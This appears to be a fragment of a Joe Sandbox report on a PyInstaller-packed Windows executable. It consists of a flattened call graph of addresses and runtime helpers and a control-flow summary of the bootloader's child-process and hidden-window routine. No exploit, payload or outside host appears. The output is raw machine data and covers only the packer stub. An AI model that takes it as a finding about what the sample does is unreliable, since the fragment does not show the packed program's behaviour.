7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17064->17066 17067 7ff7c26629c3 17065->17067 17066->17063 17075 7ff7c26751d0 17067->17075 17069 7ff7c2674b61 17072 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17069->17072 17070 7ff7c2674bb0 17070->17064 17071 7ff7c2674bba 17070->17071 17074 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17071->17074 17072->17063 17073 7ff7c2674b58 17073->17064 17073->17069 17074->17063 17076 7ff7c267b338 memcpy_s 11 API calls 17075->17076 17077 7ff7c26751e7 17076->17077 17078 7ff7c26629e5 17077->17078 17079 7ff7c267ec08 memcpy_s 11 API calls 17077->17079 17082 7ff7c2675227 17077->17082 17078->17019 17080 7ff7c267521c 17079->17080 17081 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17080->17081 17081->17082 17082->17078 17234 7ff7c267ec90 17082->17234 17085 7ff7c267a970 _isindst 17 API calls 17086 7ff7c267526c 17085->17086 17088 7ff7c266262f 17087->17088 17089 7ff7c2669400 2 API calls 17088->17089 17090 7ff7c2662660 17089->17090 17091 7ff7c2662683 MessageBoxA 17090->17091 17092 7ff7c266266f MessageBoxW 17090->17092 17093 7ff7c2662690 17091->17093 17092->17093 17094 7ff7c266c5c0 _log10_special 8 API calls 17093->17094 17095 7ff7c26626a0 17094->17095 17095->17023 17097 7ff7c2672cbe 17096->17097 17102 7ff7c2672cae 17096->17102 17098 7ff7c2672cc7 17097->17098 17106 7ff7c2672cf5 17097->17106 17099 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17098->17099 17101 7ff7c2672ced 17099->17101 17100 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17100->17101 17101->17064 17101->17069 17101->17070 17101->17073 17102->17100 17103 7ff7c2674830 45 API calls 17103->17106 17105 7ff7c2672fa4 17108 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17105->17108 17106->17101 17106->17102 17106->17103 17106->17105 17110 7ff7c2673610 17106->17110 17136 7ff7c26732d8 17106->17136 17166 7ff7c2672b60 17106->17166 17108->17102 17111 7ff7c26736c5 17110->17111 17112 7ff7c2673652 17110->17112 17113 7ff7c26736ca 17111->17113 17116 7ff7c267371f 17111->17116 17114 7ff7c2673658 17112->17114 17115 7ff7c26736ef 17112->17115 17119 7ff7c26736ff 17113->17119 17121 7ff7c26736cc 17113->17121 17118 7ff7c267365d 17114->17118 17123 7ff7c267372e 17114->17123 17183 7ff7c2671bc0 17115->17183 17116->17115 17116->17123 17134 7ff7c2673688 17116->17134 17124 7ff7c267366d 17118->17124 17125 7ff7c26736a0 17118->17125 17118->17134 17190 7ff7c26717b0 17119->17190 17121->17124 17126 7ff7c26736db 17121->17126 17135 7ff7c267375d 17123->17135 17197 7ff7c2671fd0 17123->17197 17124->17135 17169 7ff7c2673f74 17124->17169 17125->17135 17179 7ff7c2674430 17125->17179 17126->17115 17128 7ff7c26736e0 17126->17128 17131 7ff7c26745c8 37 API calls 17128->17131 17128->17135 17130 7ff7c266c5c0 _log10_special 8 API calls 17132 7ff7c26739f3 17130->17132 17131->17134 17132->17106 17134->17135 17204 7ff7c267e8c8 17134->17204 17135->17130 17137 7ff7c26732f9 17136->17137 17138 7ff7c26732e3 17136->17138 17139 7ff7c2673337 17137->17139 17140 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17137->17140 17138->17139 17141 7ff7c26736c5 17138->17141 17142 7ff7c2673652 17138->17142 17139->17106 17140->17139 17143 7ff7c26736ca 17141->17143 17144 7ff7c267371f 17141->17144 17145 7ff7c2673658 17142->17145 17146 7ff7c26736ef 17142->17146 17147 7ff7c26736cc 17143->17147 17148 7ff7c26736ff 17143->17148 17144->17146 17149 7ff7c267372e 17144->17149 17164 7ff7c2673688 17144->17164 17145->17149 17153 7ff7c267365d 17145->17153 17150 7ff7c2671bc0 38 API calls 17146->17150 17156 7ff7c26736db 17147->17156 17157 7ff7c267366d 17147->17157 17151 7ff7c26717b0 38 API calls 17148->17151 17155 7ff7c2671fd0 38 API calls 17149->17155 17165 7ff7c267375d 17149->17165 17150->17164 17151->17164 17152 7ff7c2673f74 47 API calls 17152->17164 17154 7ff7c26736a0 17153->17154 17153->17157 17153->17164 17158 7ff7c2674430 47 API calls 17154->17158 17154->17165 17155->17164 17156->17146 17159 7ff7c26736e0 17156->17159 17157->17152 17157->17165 17158->17164 17161 7ff7c26745c8 37 API calls 17159->17161 17159->17165 17160 7ff7c266c5c0 _log10_special 8 API calls 17162 7ff7c26739f3 17160->17162 17161->17164 17162->17106 17163 7ff7c267e8c8 47 API calls 17163->17164 17164->17163 17164->17165 17165->17160 17217 7ff7c2670d84 17166->17217 17170 7ff7c2673f96 17169->17170 17171 7ff7c2670bf0 12 API calls 17170->17171 17172 7ff7c2673fde 17171->17172 17173 7ff7c267e5e0 46 API calls 17172->17173 17175 7ff7c26740b1 17173->17175 17174 7ff7c26740d3 17177 7ff7c2674830 45 API calls 17174->17177 17178 7ff7c267415c 17174->17178 17175->17174 17176 7ff7c2674830 45 API calls 17175->17176 17176->17174 17177->17178 17178->17134 17180 7ff7c2674448 17179->17180 17182 7ff7c26744b0 17179->17182 17181 7ff7c267e8c8 47 API calls 17180->17181 17180->17182 17181->17182 17182->17134 17184 7ff7c2671bf3 17183->17184 17185 7ff7c2671c22 17184->17185 17187 7ff7c2671cdf 17184->17187 17186 7ff7c2670bf0 12 API calls 17185->17186 17189 7ff7c2671c5f 17185->17189 17186->17189 17188 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17187->17188 17188->17189 17189->17134 17191 7ff7c26717e3 17190->17191 17192 7ff7c2671812 17191->17192 17194 7ff7c26718cf 17191->17194 17193 7ff7c2670bf0 12 API calls 17192->17193 17196 7ff7c267184f 17192->17196 17193->17196 17195 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17194->17195 17195->17196 17196->17134 17198 7ff7c2672003 17197->17198 17199 7ff7c2672032 17198->17199 17201 7ff7c26720ef 17198->17201 17200 7ff7c2670bf0 12 API calls 17199->17200 17203 7ff7c267206f 17199->17203 17200->17203 17202 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17201->17202 17202->17203 17203->17134 17205 7ff7c267e8f0 17204->17205 17206 7ff7c267e935 17205->17206 17207 7ff7c2674830 45 API calls 17205->17207 17209 7ff7c267e8f5 memcpy_s 17205->17209 17213 7ff7c267e91e memcpy_s 17205->17213 17206->17209 17206->17213 17214 7ff7c2680858 17206->17214 17207->17206 17208 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17208->17209 17209->17134 17213->17208 17213->17209 17216 7ff7c268087c WideCharToMultiByte 17214->17216 17218 7ff7c2670dc3 17217->17218 17219 7ff7c2670db1 17217->17219 17222 7ff7c2670dd0 17218->17222 17225 7ff7c2670e0d 17218->17225 17220 7ff7c2674f78 memcpy_s 11 API calls 17219->17220 17221 7ff7c2670db6 17220->17221 17223 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17221->17223 17224 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 17222->17224 17231 7ff7c2670dc1 17223->17231 17224->17231 17226 7ff7c2670eb6 17225->17226 17228 7ff7c2674f78 memcpy_s 11 API calls 17225->17228 17227 7ff7c2674f78 memcpy_s 11 API calls 17226->17227 17226->17231 17230 7ff7c2670f60 17227->17230 17229 7ff7c2670eab 17228->17229 17232 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17229->17232 17233 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17230->17233 17231->17106 17232->17226 17233->17231 17238 7ff7c267ecad 17234->17238 17235 7ff7c267ecb2 17236 7ff7c267524d 17235->17236 17237 7ff7c2674f78 memcpy_s 11 API calls 17235->17237 17236->17078 17236->17085 17239 7ff7c267ecbc 17237->17239 17238->17235 17238->17236 17241 7ff7c267ecfc 17238->17241 17240 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17239->17240 17240->17236 17241->17236 17242 7ff7c2674f78 memcpy_s 11 API calls 17241->17242 17242->17239 17244 7ff7c26782c8 17243->17244 17245 7ff7c26782b5 17243->17245 17253 7ff7c2677f2c 17244->17253 17246 7ff7c2674f78 memcpy_s 11 API calls 17245->17246 17248 7ff7c26782ba 17246->17248 17250 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17248->17250 17251 7ff7c26782c6 17250->17251 17251->16227 17260 7ff7c2680348 EnterCriticalSection 17253->17260 17262 7ff7c2668823 __std_exception_destroy 17261->17262 17263 7ff7c26687a1 GetTokenInformation 17261->17263 17266 7ff7c266883c 17262->17266 17267 7ff7c2668836 CloseHandle 17262->17267 17264 7ff7c26687cd 17263->17264 17265 7ff7c26687c2 GetLastError 17263->17265 17264->17262 17268 7ff7c26687e9 GetTokenInformation 17264->17268 17265->17262 17265->17264 17266->16232 17267->17266 17268->17262 17270 7ff7c266880c 17268->17270 17269 7ff7c2668816 ConvertSidToStringSidW 17269->17262 17270->17262 17270->17269 17272 7ff7c266c8c0 17271->17272 17273 7ff7c2662b74 GetCurrentProcessId 17272->17273 17274 7ff7c26626b0 48 API calls 17273->17274 17275 7ff7c2662bc7 17274->17275 17276 7ff7c2674c48 48 API calls 17275->17276 17277 7ff7c2662c10 MessageBoxW 17276->17277 17278 7ff7c266c5c0 _log10_special 8 API calls 17277->17278 17279 7ff7c2662c40 17278->17279 17279->16242 17281 7ff7c26625e5 17280->17281 17282 7ff7c2674c48 48 API calls 17281->17282 17283 7ff7c2662604 17282->17283 17283->16257 17319 7ff7c2678804 17284->17319 17288 7ff7c26681cc 17287->17288 17289 7ff7c2669400 2 API calls 17288->17289 17290 7ff7c26681eb 17289->17290 17291 7ff7c2668206 ExpandEnvironmentStringsW 17290->17291 17292 7ff7c26681f3 17290->17292 17294 7ff7c266822c __std_exception_destroy 17291->17294 17293 7ff7c2662810 49 API calls 17292->17293 17299 7ff7c26681ff __std_exception_destroy 17293->17299 17295 7ff7c2668243 17294->17295 17296 7ff7c2668230 17294->17296 17360 7ff7c26815c8 17319->17360 17419 7ff7c2681340 17360->17419 17440 7ff7c2680348 EnterCriticalSection 17419->17440 17559 7ff7c266455a 17558->17559 17560 7ff7c2669400 2 API calls 17559->17560 17561 7ff7c266457f 17560->17561 17562 7ff7c266c5c0 _log10_special 8 API calls 17561->17562 17563 7ff7c26645a7 17562->17563 17563->16295 17565 7ff7c2667e1e 17564->17565 17566 7ff7c2661c80 49 API calls 17565->17566 17569 7ff7c2667f42 17565->17569 17572 7ff7c2667ea5 17566->17572 17567 7ff7c266c5c0 _log10_special 8 API calls 17568 7ff7c2667f73 17567->17568 17568->16295 17569->17567 17570 7ff7c2661c80 49 API calls 17570->17572 17571 7ff7c2664550 10 API calls 17571->17572 17572->17569 17572->17570 17572->17571 17573 7ff7c2667efb 17572->17573 17574 7ff7c2669400 2 API calls 17573->17574 17575 7ff7c2667f13 CreateDirectoryW 17574->17575 17575->17569 17575->17572 17577 7ff7c2661637 17576->17577 17578 7ff7c2661613 17576->17578 17580 7ff7c26645b0 108 API calls 17577->17580 17697 7ff7c2661050 17578->17697 17581 7ff7c266164b 17580->17581 17583 7ff7c2661653 17581->17583 17584 7ff7c2661682 17581->17584 17582 7ff7c2661618 17585 7ff7c266162e 17582->17585 17588 7ff7c2662710 54 API calls 17582->17588 17586 7ff7c2674f78 memcpy_s 11 API calls 17583->17586 17587 7ff7c26645b0 108 API calls 17584->17587 17585->16295 17589 7ff7c2661658 17586->17589 17590 7ff7c2661696 17587->17590 17588->17585 17591 7ff7c2662910 54 API calls 17589->17591 17592 7ff7c266169e 17590->17592 17593 7ff7c26616b8 17590->17593 17594 7ff7c2661671 17591->17594 17595 7ff7c2662710 54 API calls 17592->17595 17596 7ff7c2670744 73 API calls 17593->17596 17594->16295 17597 7ff7c26616ae 17595->17597 17598 7ff7c26616cd 17596->17598 17625 7ff7c2667134 17624->17625 17627 7ff7c266717b 17624->17627 17625->17627 17761 7ff7c2675094 17625->17761 17627->16295 17629 7ff7c2664191 17628->17629 17630 7ff7c26644d0 49 API calls 17629->17630 17631 7ff7c26641cb 17630->17631 17632 7ff7c26644d0 49 API calls 17631->17632 17633 7ff7c26641db 17632->17633 17634 7ff7c266422c 17633->17634 17635 7ff7c26641fd 17633->17635 17637 7ff7c2664100 51 API calls 17634->17637 17792 7ff7c2664100 17635->17792 17638 7ff7c266422a 17637->17638 17639 7ff7c266428c 17638->17639 17640 7ff7c2664257 17638->17640 17641 7ff7c2664100 51 API calls 17639->17641 17799 7ff7c2667ce0 17640->17799 17673 7ff7c2661c80 49 API calls 17672->17673 17674 7ff7c2664464 17673->17674 17674->16295 17698 7ff7c26645b0 108 API calls 17697->17698 17699 7ff7c266108c 17698->17699 17700 7ff7c26610a9 17699->17700 17701 7ff7c2661094 17699->17701 17702 7ff7c2670744 73 API calls 17700->17702 17703 7ff7c2662710 54 API calls 17701->17703 17704 7ff7c26610bf 17702->17704 17709 7ff7c26610a4 __std_exception_destroy 17703->17709 17705 7ff7c26610c3 17704->17705 17706 7ff7c26610e6 17704->17706 17707 7ff7c2674f78 memcpy_s 11 API calls 17705->17707 17711 7ff7c26610f7 17706->17711 17712 7ff7c2661122 17706->17712 17708 7ff7c26610c8 17707->17708 17709->17582 17714 7ff7c2674f78 memcpy_s 11 API calls 17711->17714 17762 7ff7c26750a1 17761->17762 17764 7ff7c26750ce 17761->17764 17763 7ff7c2674f78 memcpy_s 11 API calls 17762->17763 17773 7ff7c2675058 17762->17773 17767 7ff7c26750ab 17763->17767 17765 7ff7c26750f1 17764->17765 17766 7ff7c267510d 17764->17766 17768 7ff7c2674f78 memcpy_s 11 API calls 17765->17768 17776 7ff7c2674fbc 17766->17776 17770 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17767->17770 17771 7ff7c26750f6 17768->17771 17772 7ff7c26750b6 17770->17772 17774 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17771->17774 17772->17625 17773->17625 17775 7ff7c2675101 17774->17775 17775->17625 17777 7ff7c2674fe0 17776->17777 17778 7ff7c2674fdb 17776->17778 17777->17778 17779 7ff7c267b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17777->17779 17778->17775 17780 7ff7c2674ffb 17779->17780 17784 7ff7c267d9f4 17780->17784 17793 7ff7c2664126 17792->17793 17794 7ff7c26749f4 49 API calls 17793->17794 17795 7ff7c266414c 17794->17795 17856 7ff7c2675f38 17855->17856 17857 7ff7c2675f5e 17856->17857 17860 7ff7c2675f91 17856->17860 17858 7ff7c2674f78 memcpy_s 11 API calls 17857->17858 17859 7ff7c2675f63 17858->17859 17861 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 17859->17861 17862 7ff7c2675f97 17860->17862 17863 7ff7c2675fa4 17860->17863 17866 7ff7c2664606 17861->17866 17864 7ff7c2674f78 memcpy_s 11 API calls 17862->17864 17874 7ff7c267ac98 17863->17874 17864->17866 17866->16320 17887 7ff7c2680348 EnterCriticalSection 17874->17887 18247 7ff7c2677968 18246->18247 18250 7ff7c2677444 18247->18250 18249 7ff7c2677981 18249->16330 18251 7ff7c267748e 18250->18251 18252 7ff7c267745f 18250->18252 18260 7ff7c26754dc EnterCriticalSection 18251->18260 18254 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 18252->18254 18257 7ff7c267747f 18254->18257 18257->18249 18262 7ff7c266feb3 18261->18262 18263 7ff7c266fee1 18261->18263 18264 7ff7c267a884 _invalid_parameter_noinfo 37 API calls 18262->18264 18265 7ff7c266fed3 18263->18265 18271 7ff7c26754dc EnterCriticalSection 18263->18271 18264->18265 18265->16334 18273 7ff7c266cb62 RtlLookupFunctionEntry 18272->18273 18274 7ff7c266cb78 RtlVirtualUnwind 18273->18274 18275 7ff7c266c97b 18273->18275 18274->18273 18274->18275 18276 7ff7c266c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18275->18276 18278 7ff7c26645b0 108 API calls 18277->18278 18279 7ff7c2661493 18278->18279 18280 7ff7c26614bc 18279->18280 18281 7ff7c266149b 18279->18281 18283 7ff7c2670744 73 API calls 18280->18283 18282 7ff7c2662710 54 API calls 18281->18282 18285 7ff7c26614ab 18282->18285 18284 7ff7c26614d1 18283->18284 18286 7ff7c26614f8 18284->18286 18287 7ff7c26614d5 18284->18287 18285->16369 18384 7ff7c2666365 18383->18384 18385 7ff7c2661c80 49 API calls 18384->18385 18386 7ff7c26663a1 18385->18386 18387 7ff7c26663cd 18386->18387 18388 7ff7c26663aa 18386->18388 18390 7ff7c2664620 49 API calls 18387->18390 18389 7ff7c2662710 54 API calls 18388->18389 18406 7ff7c26663c3 18389->18406 18391 7ff7c26663e5 18390->18391 18392 7ff7c2666403 18391->18392 18393 7ff7c2662710 54 API calls 18391->18393 18394 7ff7c2664550 10 API calls 18392->18394 18393->18392 18397 7ff7c266640d 18394->18397 18395 7ff7c266c5c0 _log10_special 8 API calls 18396 7ff7c266336e 18395->18396 18396->16443 18414 7ff7c26664f0 18396->18414 18406->18395 18563 7ff7c26653f0 18414->18563 18673 7ff7c267b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18672->18673 18675 7ff7c267a451 18673->18675 18677 7ff7c267a574 18675->18677 18686 7ff7c26836c0 18677->18686 18712 7ff7c2683678 18686->18712 18717 7ff7c2680348 EnterCriticalSection 18712->18717 19359 7ff7c2675698 19360 7ff7c26756b2 19359->19360 19361 7ff7c26756cf 19359->19361 19362 7ff7c2674f58 _fread_nolock 11 API calls 19360->19362 19361->19360 19363 7ff7c26756e2 CreateFileW 19361->19363 19366 7ff7c26756b7 19362->19366 19364 7ff7c267574c 19363->19364 19365 7ff7c2675716 19363->19365 19410 7ff7c2675c74 19364->19410 19384 7ff7c26757ec GetFileType 19365->19384 19369 7ff7c2674f78 memcpy_s 11 API calls 19366->19369 19372 7ff7c26756bf 19369->19372 19377 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19372->19377 19373 7ff7c267572b CloseHandle 19378 7ff7c26756ca 19373->19378 19374 7ff7c2675741 CloseHandle 19374->19378 19375 7ff7c2675755 19379 7ff7c2674eec _fread_nolock 11 API calls 19375->19379 19376 7ff7c2675780 19431 7ff7c2675a34 19376->19431 19377->19378 19383 7ff7c267575f 19379->19383 19383->19378 19385 7ff7c267583a 19384->19385 19386 7ff7c26758f7 19384->19386 19387 7ff7c2675866 GetFileInformationByHandle 19385->19387 19391 7ff7c2675b70 21 API calls 19385->19391 19388 7ff7c2675921 19386->19388 19389 7ff7c26758ff 19386->19389 19392 7ff7c2675912 GetLastError 19387->19392 19393 7ff7c267588f 19387->19393 19390 7ff7c2675944 PeekNamedPipe 19388->19390 19409 7ff7c26758e2 19388->19409 19389->19392 19394 7ff7c2675903 19389->19394 19390->19409 19396 7ff7c2675854 19391->19396 19395 7ff7c2674eec _fread_nolock 11 API calls 19392->19395 19397 7ff7c2675a34 51 API calls 19393->19397 19398 7ff7c2674f78 memcpy_s 11 API calls 19394->19398 19395->19409 19396->19387 19396->19409 19400 7ff7c267589a 19397->19400 19398->19409 19399 7ff7c266c5c0 _log10_special 8 API calls 19401 7ff7c2675724 19399->19401 19448 7ff7c2675994 19400->19448 19401->19373 19401->19374 19404 7ff7c2675994 10 API calls 19405 7ff7c26758b9 19404->19405 19406 7ff7c2675994 10 API calls 19405->19406 19407 7ff7c26758ca 19406->19407 19408 7ff7c2674f78 memcpy_s 11 API calls 19407->19408 19407->19409 19408->19409 19409->19399 19411 7ff7c2675caa 19410->19411 19412 7ff7c2675d42 __std_exception_destroy 19411->19412 19413 7ff7c2674f78 memcpy_s 11 API calls 19411->19413 19414 7ff7c266c5c0 _log10_special 8 API calls 19412->19414 19415 7ff7c2675cbc 19413->19415 19416 7ff7c2675751 19414->19416 19417 7ff7c2674f78 memcpy_s 11 API calls 19415->19417 19416->19375 19416->19376 19418 7ff7c2675cc4 19417->19418 19419 7ff7c2677e78 45 API calls 19418->19419 19420 7ff7c2675cd9 19419->19420 19421 7ff7c2675ceb 19420->19421 19422 7ff7c2675ce1 19420->19422 19424 7ff7c2674f78 memcpy_s 11 API calls 19421->19424 19423 7ff7c2674f78 memcpy_s 11 API calls 19422->19423 19430 7ff7c2675ce6 19423->19430 19425 7ff7c2675cf0 19424->19425 19425->19412 19426 7ff7c2674f78 memcpy_s 11 API calls 19425->19426 19427 7ff7c2675cfa 19426->19427 19428 7ff7c2677e78 45 API calls 19427->19428 19428->19430 19429 7ff7c2675d34 GetDriveTypeW 19429->19412 19430->19412 19430->19429 19433 7ff7c2675a5c 19431->19433 19432 7ff7c267578d 19441 7ff7c2675b70 19432->19441 19433->19432 19455 7ff7c267f794 19433->19455 19435 7ff7c2675af0 19435->19432 19436 7ff7c267f794 51 API calls 19435->19436 19437 7ff7c2675b03 19436->19437 19437->19432 19438 7ff7c267f794 51 API calls 19437->19438 19439 7ff7c2675b16 19438->19439 19439->19432 19440 7ff7c267f794 51 API calls 19439->19440 19440->19432 19442 7ff7c2675b8a 19441->19442 19443 7ff7c2675bc1 19442->19443 19444 7ff7c2675b9a 19442->19444 19445 7ff7c267f628 21 API calls 19443->19445 19446 7ff7c2675baa 19444->19446 19447 7ff7c2674eec _fread_nolock 11 API calls 19444->19447 19445->19446 19446->19383 19447->19446 19449 7ff7c26759bd FileTimeToSystemTime 19448->19449 19450 7ff7c26759b0 19448->19450 19451 7ff7c26759d1 SystemTimeToTzSpecificLocalTime 19449->19451 19452 7ff7c26759b8 19449->19452 19450->19449 19450->19452 19451->19452 19453 7ff7c266c5c0 _log10_special 8 API calls 19452->19453 19454 7ff7c26758a9 19453->19454 19454->19404 19456 7ff7c267f7c5 19455->19456 19457 7ff7c267f7a1 19455->19457 19460 7ff7c267f7ff 19456->19460 19462 7ff7c267f81e 19456->19462 19457->19456 19458 7ff7c267f7a6 19457->19458 19459 7ff7c2674f78 memcpy_s 11 API calls 19458->19459 19463 7ff7c267f7ab 19459->19463 19461 7ff7c2674f78 memcpy_s 11 API calls 19460->19461 19464 7ff7c267f804 19461->19464 19465 7ff7c2674fbc 45 API calls 19462->19465 19466 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19463->19466 19467 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19464->19467 19471 7ff7c267f82b 19465->19471 19468 7ff7c267f7b6 19466->19468 19470 7ff7c267f80f 19467->19470 19468->19435 19469 7ff7c268054c 51 API calls 19469->19471 19470->19435 19471->19469 19471->19470 19695 7ff7c2681720 19706 7ff7c2687454 19695->19706 19707 7ff7c2687461 19706->19707 19708 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19707->19708 19709 7ff7c268747d 19707->19709 19708->19707 19710 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19709->19710 19711 7ff7c2681729 19709->19711 19710->19709 19712 7ff7c2680348 EnterCriticalSection 19711->19712

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FF7C2668BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 7ff7c2668bd0-7ff7c2668d16 call 7ff7c266c8c0 call 7ff7c2669400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c call 7ff7c2675460 call 7ff7c267a4ec call 7ff7c267878c GetCommandLineW CreateProcessW 23 7ff7c2668d3d-7ff7c2668d79 RegisterClassW 0->23 24 7ff7c2668d18-7ff7c2668d38 GetLastError call 7ff7c2662c50 0->24 26 7ff7c2668d7b GetLastError 23->26 27 7ff7c2668d81-7ff7c2668dd5 CreateWindowExW 23->27 32 7ff7c2669029-7ff7c266904f call 7ff7c266c5c0 24->32 26->27 28 7ff7c2668dd7-7ff7c2668ddd GetLastError 27->28 29 7ff7c2668ddf-7ff7c2668de4 ShowWindow 27->29 31 7ff7c2668dea-7ff7c2668dfa WaitForSingleObject 28->31 29->31 33 7ff7c2668dfc 31->33 34 7ff7c2668e78-7ff7c2668e7f 31->34 37 7ff7c2668e00-7ff7c2668e03 33->37 38 7ff7c2668e81-7ff7c2668e91 WaitForSingleObject 34->38 39 7ff7c2668ec2-7ff7c2668ec9 34->39 42 7ff7c2668e0b-7ff7c2668e12 37->42 43 7ff7c2668e05 GetLastError 37->43 44 7ff7c2668e97-7ff7c2668ea7 TerminateProcess 38->44 45 7ff7c2668fe8-7ff7c2668ff2 38->45 40 7ff7c2668ecf-7ff7c2668ee5 QueryPerformanceFrequency QueryPerformanceCounter 39->40 41 7ff7c2668fb0-7ff7c2668fc9 GetMessageW 39->41 46 7ff7c2668ef0-7ff7c2668f28 MsgWaitForMultipleObjects PeekMessageW 40->46 48 7ff7c2668fcb-7ff7c2668fd9 TranslateMessage DispatchMessageW 41->48 49 7ff7c2668fdf-7ff7c2668fe6 41->49 42->38 47 7ff7c2668e14-7ff7c2668e31 PeekMessageW 42->47 43->42 52 7ff7c2668ea9 GetLastError 44->52 53 7ff7c2668eaf-7ff7c2668ebd WaitForSingleObject 44->53 50 7ff7c2668ff4-7ff7c2668ffa DestroyWindow 45->50 51 7ff7c2669001-7ff7c2669025 GetExitCodeProcess CloseHandle * 2 45->51 54 7ff7c2668f2a 46->54 55 7ff7c2668f63-7ff7c2668f6a 46->55 56 7ff7c2668e66-7ff7c2668e76 WaitForSingleObject 47->56 57 7ff7c2668e33-7ff7c2668e64 TranslateMessage DispatchMessageW PeekMessageW 47->57 48->49 49->41 49->45 50->51 51->32 52->53 53->45 58 7ff7c2668f30-7ff7c2668f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->41 59 7ff7c2668f6c-7ff7c2668f95 QueryPerformanceCounter 55->59 56->34 56->37 57->56 57->57 58->55 58->58 59->46 60 7ff7c2668f9b-7ff7c2668fa2 59->60 60->45 61 7ff7c2668fa4-7ff7c2668fa8 60->61 61->41
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                    • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                    • Instruction ID: e773f5bb6d2d9a308ee931383deb18d7a64ca4687a63f0e4beac69a3de8c7f4d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D18431A08B8286E710AF74E8542A9B772FB44B68F800235DA9D63FA5DFBCD544C774
                                                                                                                                                                                                                                                                    Function 00007FF7C2661000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
